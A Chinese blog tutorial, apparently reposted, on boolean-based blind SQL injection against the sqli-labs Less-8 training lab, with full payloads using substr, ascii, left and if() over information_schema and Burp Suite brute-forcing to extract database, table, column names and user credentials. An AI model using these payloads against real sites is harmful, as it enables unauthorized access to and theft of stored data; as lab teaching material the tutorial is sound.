布尔盲注——多种方式实现及利用burpsuite爆破

目录

1、判断闭合符类型

 2、爆数据库长度

 3、查询库名

手动注入

burpsuite爆破

 方法一:用ASCII码值转化爆破

 方法二:left方法直接爆破字母

 方法三:if方法爆破注入(最简单)

 4、爆破表名

 5、爆破具体值


当我们改变前端页面传输给后台sql参数时,页面没有显示相应内容也没有显示报错信息时,页面呈现出两种状态,正常或者不正常。根据这两种状态可以判断我们输入的语句是否查询成功。不能使用联合查询注入和报错注入,这时我们可以考虑是否为基于布尔的盲注。

接下来我们用实例来感受下布尔盲注!!

以sqli-labs-masterless-8关为例:

1、判断闭合符类型

当输入

?id=1' 

页面显示没有结果

 但当加入--+之后,页面又显示正常,这说明,闭合符就是

 当输入

?id=1' and 1=1 --+        #显示正常

?id=1' and 1=1 --+        #显示异常

 就可以确定是布尔盲注了.

 2、爆数据库长度

?id=1' and length(database())>=10 --+

 length()函数返回字符串的长度,这里采用二分法,直到找到一个分界点,即为数据库长度,这里得到长度为8

 3、查询库名

手动注入

手动一个一个测试

ascii()  #返回ASCII码值

substr(要截取的字符串,开始位,截取的长度)        #截取字符串

 构造payload:

?id=1' and ascii(substr(database(),1,1))>=115 --+        #显示正常

?id=1' and ascii(substr(database(),1,1))>=116 --+        #显示异常

 说明数据库名的第一个字符的ascii码值为115,查询ascii码表即可得知对应的字符为s

查询第二个字符需要将开始位改为2,再一个一个查询即:

?id=1' and ascii(substr(database(),2,1))>=115 --+ 

 已知库名长度为八,我们可以尝试手动注入八次,但是这样消耗的时间太长了,我们还可以利用脚本和burpsuit来爆破,这里演示用bp爆破库名

burpsuite爆破

可以采用三种方式来构造payload进行爆破

?id=1' and ascii(substr(database(),1,1))=115 --+

?id=1' and left(database(),1)='s' --+
 

 方法一:用ASCII码值转化爆破
?id=1' and ascii(substr(database(),1,1))=115 --+

 substr的第一个1表示从第一位开始,第二个一表示每次爆破一位,于是我们的爆破点就有两个

 一号爆破点选择1~8,因为之前我们已经得知数据库名字长度为8位了,所以只需选择一到八

二号爆破点选择的是字母的ascii码值,可以从本地导入,于是得到库名

 查询ascii码表即可得知库名为security

 方法二:left方法直接爆破字母

介绍一下left函数 left(参数1,参数2) 意为 将参数1从左开始取参数2个

示例: left(abc,2) 返回值为ab

之后将他与字符串进行比较 例如 left(abc,1)>'a' 返回结果为false 因为 ‘a’=‘a’

同样的left(abc,2)>'aa' 返回结果为TURE 因为‘ab’是要大于‘aa’

根据返回的结果的真假 与前面的语句用and相连接 构造逻辑关系

及 后面结果为真 页面就正常回显 若后面的语句为假 则 页面回显异常

构造payload:

?id=1' and left(database(),1)='s' --+

 用burpsuite抓包后选择字符为爆破点

 爆破内容选择a~z26个字母

 第一个爆破结果如图所示,这种方法的限制是一次只能爆破一个字母

 如果要接着爆破下一个字母,需要在爆破点前加上爆破出来的字母,并将left函数里面的数字修改。如:爆破第二个字母,需要将1改为2,并在爆破点前加上刚刚爆破出来的s,这是由left的匹配机制所决定的,2的意思是字符的前两个字母,于是需要加上s

 爆破出来的第二个字母为e

 后面也都是一样的步骤,这里就不赘述了。用left()从database()中选取字符进行爆破,这种方法的缺点是太过于复杂,需要逐次爆破,通常不使用这种方法。

 方法三:if方法爆破注入(最简单)

if(1=1,1,0)         表示:如果1=1,则返回1,否则返回0;

 构造payload:

?id=1' and if(substr(database(),1,1)='s',1,0) --+

 substr(database(),1,1)=’s'表示从库名选择第一个字母,判断其是否等于s,如果是,则返回1,页面正常显示,如果不是,则返回2,页面显示异常

选择两个爆破点:

 爆破结果:得到库名security

 4、爆破表名

?id=1' and if(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='a',1,0) --+

 select table_name from information_schema.tables where table_schema=database():在当前数据库内查询表名,由于一个数据库中通常有许多表,于是我们需要用 limit 0,1来限制行数,

limit 0,1表示从第一条开始取出一条数据,需要注意的是limit默认下标从0开始,第一个参数是下标,查数据的话是从第一条查,第二个参数限定了几条数据。

(select table_name from information_schema.tables where table_schema=database() limit 0,1):选择第一行的数据,即第一个表名

substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1):每次取一个字母进行爆破,第一个1表示从第一个字母开始,第二个一表示每次取一个

选择爆破点,依旧还是选择集束炸弹模式,让两个爆破点爆破的数据随机组合

 这里由于不知道表名有多少个字符,字典可以选择长一点,这里我们选择0~20

 第二个爆破点依旧选择26个字母

 最终得到第一个表名:emails

 后面继续爆破剩下的表名,只需改动limit为对应行即可,如要爆破第二个表名,只需将limit 0,1改为limit 1,1即可。

得到第2个表名referers,后面就不再一一演示了。

 

 5、爆破列名

只需将表名改为列名,并限制要查询表的名称,如要查询users表中的列名,构造payload

?id=1' and if(substring((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1)='a',1,0)--+

 同样可以一个一个地查询列名 

 

 但是一行一行查太麻烦了,我们可以尝试一次查询多行,只需将limit限制查询的行数也进行爆破即可。爆破点如下:

 爆破结果:

 5、爆破具体值

我们尝试爆破password和username两列的值,由于username和password列中有许多组数据,这里就只示例一组数据的爆破。

首先爆破username的值,构造payload

?id=1' and if(substring((select username from users limit 0,1),1,1)='a',1,0)--+

 

 得到第一个username的值dumb:

接下来爆破password的值:

构造payload:

?id=1' and if(substring((select password from users limit 0,1),1,1)='a',1,0)--+

 

 得到password依旧为dumb

 

 于是我们拿到了第一组数据,其username和password均为dumb;

今天就写到这里啦,喜欢的话给我点个赞吧,我们一起成长!!!

后续还会更新更多sql注入的内容,喜欢的宝子可以关注我的sql专栏哦~_~

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/51074.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Java | Leetcode Java题解之第279题完全平方数

题目&#xff1a; 题解&#xff1a; class Solution {public int numSquares(int n) {if (isPerfectSquare(n)) {return 1;}if (checkAnswer4(n)) {return 4;}for (int i 1; i * i < n; i) {int j n - i * i;if (isPerfectSquare(j)) {return 2;}}return 3;}// 判断是否为…

夜不能寐?解锁失眠自救秘籍,让你重拾安睡之夜!

在这个快节奏的时代&#xff0c;失眠似乎成了许多人的“隐形伴侣”&#xff0c;悄悄侵蚀着我们的健康与幸福感。夜深人静&#xff0c;万籁俱寂之时&#xff0c;你却辗转反侧&#xff0c;难以入眠&#xff0c;第二天又拖着疲惫的身躯迎接新的挑战。别担心&#xff0c;今天我们就…

大脑自组织神经网络通俗讲解

大脑自组织神经网络的核心概念 大脑自组织神经网络&#xff0c;是指大脑中的神经元通过自组织的方式形成复杂的网络结构&#xff0c;从而实现信息的处理和存储。这一过程涉及到神经元的生长、连接和重塑&#xff0c;是大脑学习和记忆的基础。其核心公式涉及神经网络的权重更新…

二分法各种边界,大彻大悟

1要考虑四个角度的“边界”&#xff0c;如下图 2 先考虑角度a的第一种情况 如下图所示&#xff0c;对于左边的情况&#xff0c;因为当l3&#xff0c;r4的时候&#xff0c;mid等于3&#xff0c;已知target4, 如果lmid就陷入死循环&#xff0c;所以l。右边同理。 判断c1 c2的影…

热门音效、BGM哪里可以免费下载?

剪辑的奇妙世界等你探索&#xff01;在这个创意的领域里&#xff0c;音效是创造氛围、增强表现力的重要元素。我整理了8个优质的剪辑音效素材网站&#xff0c;它们提供了丰富多样的音效资源&#xff0c;无论是制作视频、音乐还是动画&#xff0c;都能为你提供所需的声音。 1、b…

大模型学习笔记十四:Agent模型微调

文章目录 一、大模型需要Agent技术的原因二、Prompt Engineering可以实现Agent吗&#xff1f;&#xff08;1&#xff09;ReAct原理展示和代码&#xff08;2&#xff09;ModelScope&#xff08;3&#xff09;AutoGPT&#xff08;4&#xff09;ToolLLaMA 三、既然AutoGPT可以满足…

LaTeX如何改变字体颜色

诸神缄默不语-个人CSDN博文目录 在LaTeX文档中&#xff0c;改变字体颜色是一个常见需求&#xff0c;尤其是在需要强调特定文本或使文档更加生动的时候。本文将介绍如何使用\color{}命令来更改字体颜色。 文章目录 基本用法示例代码预定义颜色使用自定义颜色总结本文撰写过程中…

助力樱桃智能自动化采摘,基于嵌入式端超轻量级模型LeYOLO全系列【n/s/m/l】参数模型开发构建果园种植采摘场景下樱桃成熟度智能检测识别系统

随着科技的飞速发展&#xff0c;人工智能&#xff08;AI&#xff09;技术已经渗透到我们生活的方方面面&#xff0c;从智能家居到自动驾驶&#xff0c;再到医疗健康&#xff0c;其影响力无处不在。然而&#xff0c;当我们把目光转向中国的农业领域时&#xff0c;一个令人惊讶的…

跟《经济学人》学英文:2024年07月20日这期 A short history of AI

A short history of AI In the first of six weekly briefs, we ask how AI overcame decades of underdelivering 原文&#xff1a; Over the summer of 1956 a small but illustrious group gathered at Dartmouth College in New Hampshire; it included Claude Shannon,…

五、Spring Boot - 上手篇(1)

&#x1f33b;&#x1f33b;目录 一、快速入门&#xff1a;创建第一个SpringBoot 工程1.1 点击File--->New--->Project...1.2 选择版本和依赖的相关骨架包1.3 设置项目保存目录1.4 项目创建完成&#xff0c;工程主界面如下1.5 项目说明1.6 启动项目1.7 编写 HelloControl…

IDEA Maven使用HTTP代理,解决Could not transfer artifact org.xxx问题

文章目录 一、前言二、遇到问题三、分析问题四、HTTP代理五、重新编译验证 一、前言 遇到这个问题&#xff0c;有两种解决办法 IDEA Maven使用HTTP代理&#xff0c;解决Could not transfer artifact org.xxx问题IDEA Maven使用国内镜像&#xff0c;解决Could not transfer arti…

【PHP】ThinkPHP基础

官方手册&#xff1a;ghttps://doc.thinkphp.cn/v8_0/setup.html ghttps://doc.thinkphp.cn/v8_0/setup.html 一、部署ThinkPHP 1.安装composer composer是 PHP 的一个依赖管理工具,类似于python中的pip。 下载地址&#xff1a; https://getcomposer.org/Composer-Setup.…

低功耗单声道音频编解码器ES8311中文规格书介绍

特征 具有ADC和DAC的低功耗单声道音频编解码器ES8311。 ES8311 QFN20封装的外形和丝印 系统 • 高性能、低功耗多位 delta-sigma 音频 ADC 和 DAC • I2S/PCM 主站或从站串行数据端口 • 256/384Fs、USB 12/24 MHz 和其他非标准音频系统时钟 • I2C 接口 模数转换器 • 24…

网络安全自学从入门到精通的制胜攻略!!!

在信息时代&#xff0c;网络安全已成为至关重要的领域。越来越多的人希望通过自学掌握这门技术&#xff0c;开启充满挑战与机遇的职业道路。以下是一份精心为您打造的网络安全自学攻略&#xff0c;助您在自学之旅中乘风破浪。 一、明确目标与兴趣方向 网络安全涵盖众多领域&am…

01、爬虫学习入门

爬虫&#xff1a;通过编写程序&#xff0c;来获取获取互联网上的资源 需求&#xff1a;用程序模拟浏览器&#xff0c;输入一个网址&#xff0c;从该网址获取到资源或内容 一、入门程序 #使用urlopen来进行爬取 from urllib.request import urlopen url "http://www.ba…

AI如何助力UI设计师互联网学习?

嘿&#xff0c;咱 UI 设计师想用互联网学习&#xff0c;可真不容易&#xff01;资料筛选难&#xff0c;学习资源杂&#xff0c;真让人头疼。不过还好有 AI 工具能帮忙&#xff0c;提效率&#xff01; 这一年多来&#xff0c;我在 ai123.cn 这个平台上&#xff0c;可算是找到了…

20240724----安装git和配置git的环境变量/如何用命令git项目到本地idea

备注参考博客&#xff1a; 1&#xff09;可以参考博客&#xff0c;用git把项目git到本地 2&#xff09;可以参考博客vcs没有git 3)git版本更新&#xff0c;覆盖安装 &#xff08;一&#xff09;安装git &#xff08;1&#xff09;官网下载的链接 https://git-scm.com/downlo…

reshape函数介绍及应用

reshape 函数在 MATLAB 中是一个非常有用的函数&#xff0c;通过重新排列现有元素来重构数组。它允许你重新调整数组&#xff08;或矩阵&#xff09;的尺寸&#xff0c;而不改变其数据。这个函数特别适用于当你需要将一个矩阵或数组从一种结构转换为另一种结构时&#xff0c;只…

二阶段测试:

二阶段测试&#xff1a; 架构&#xff1a; 服务器类型部署组件ip地址DR1调度服务器 主&#xff08;ha01&#xff09;KeepalivedLVS-DR192.168.60.30DR2调度服务器 备 (ha02)KeepalivedLVS-DR192.168.60.40web1节点服务器 (slave01)NginxTomcatMySQL 备MHA managerMHA node192.…